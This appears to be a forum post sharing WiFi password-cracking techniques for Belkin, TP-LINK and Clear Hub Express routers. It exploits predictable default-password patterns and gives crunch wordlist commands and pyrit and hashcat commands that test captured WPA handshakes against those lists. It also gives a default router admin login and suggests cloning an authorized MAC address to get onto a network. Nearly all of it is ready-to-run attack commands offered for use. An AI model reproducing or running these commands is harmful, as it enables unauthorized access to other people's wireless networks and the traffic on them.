I think this is interesting: When pixie dust fails to find your password for Belkin, try Crippled-Master: https://github.com/Konsole512/Crippled and if that fails you can usually get the password by crunching hexidecimal (lower case only) thus: crunch 8 8 0123456789abcdef -t @@@@@@@@ -o /root/belkin.lst Then to test your handshake against that crunched list: pyrit -r Belkin.a1b.cap -i /root/belkin.lst attack_passthrough or with hashcat: cudahashcat32 -m 2500 -a 3 -1 0123456789abcdef Belkin.a1b.hccap ?1?1?1?1?1?1?1?1 (change "Belkin.a1b.hccap" to the actual hccap name, of course) NEXT: The last few TP-LINK routers I've purchased all use an 8 digit number for both the wifi password AND the wps pin number, so if you can capture a handshake just crunch passthrough for 8 digits. In hashcat that looks like: cudahashcat32 -m 2500 -a 3 TP-LINK-abc.hccap ?d?d?d?d?d?d?d?d NEXT: When you see an SSID like WiFiRSU_xx it's a Clear Hub Express wifi modem/router. The default wifi password will be all the characters which follow the underslash, with enough digits added to the start to make it 8 characters long. So if you see: WiFiRSU_ab1cd Then the password will be 3 digits added thus: @@@ab1cd So: crunch 8 8 0123456789 -t @@@ab1cd -o /root/WiFiRSU.lst then pyrit -r WiFiRSU_ab1cd .cap -i /root/WiFiRSU.lst attack_passthrough ANOTHER EXAMPLE: For WiFiRSU_aa the password will be six digits added thus: @@@@@@aa So: crunch 8 8 0123456789 -t @@@@@@aa -o /root/WiFiRSU.lst then pyrit -r WiFiRSU_aa.cap -i /root/WiFiRSU.lst attack_passthrough INFO: The Clear Hub Express Default Router login is: 192.168.15.1 and user/pass: NONE CLEAR123 I have not tried to connect to one of these so let me know how you make out. (You might have to clone an authorized MAC?)
